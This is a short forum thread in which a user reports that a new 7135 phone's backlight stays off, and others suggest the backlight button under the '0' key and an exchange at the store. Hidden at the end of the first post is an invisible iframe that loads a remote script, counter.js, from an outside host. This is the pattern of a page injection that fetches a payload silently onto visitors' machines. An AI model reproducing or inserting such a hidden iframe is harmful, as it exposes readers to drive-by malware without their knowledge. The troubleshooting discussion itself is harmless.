I literally took my 7135 home from the store (about 1 hour drive), opened it up, and the backlight seems to be permanently off. It worked fine in the store, and I didn't make or receive any calls on the drive home. The screen is pretty darn hard to see indoors without a backlight, so I'm hoping that I just did something stupid. Has anyone else had this problem?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Please do not be offended but since you did not specifically mention it, I have to ask, did you try pushing the backlight button located under the "0" on the keypad? If you did and that does not bring the backlight back, I would take that phone right back to the store and exchange it for a new one. No sense in trying to fix the problem when you can exchange it for a brand new one.

yes, I did read the manual and held the backlight button for a good long time hoping that would bring the backlight back to no avail. I think I will just take the phone back. Thanks for the advice.
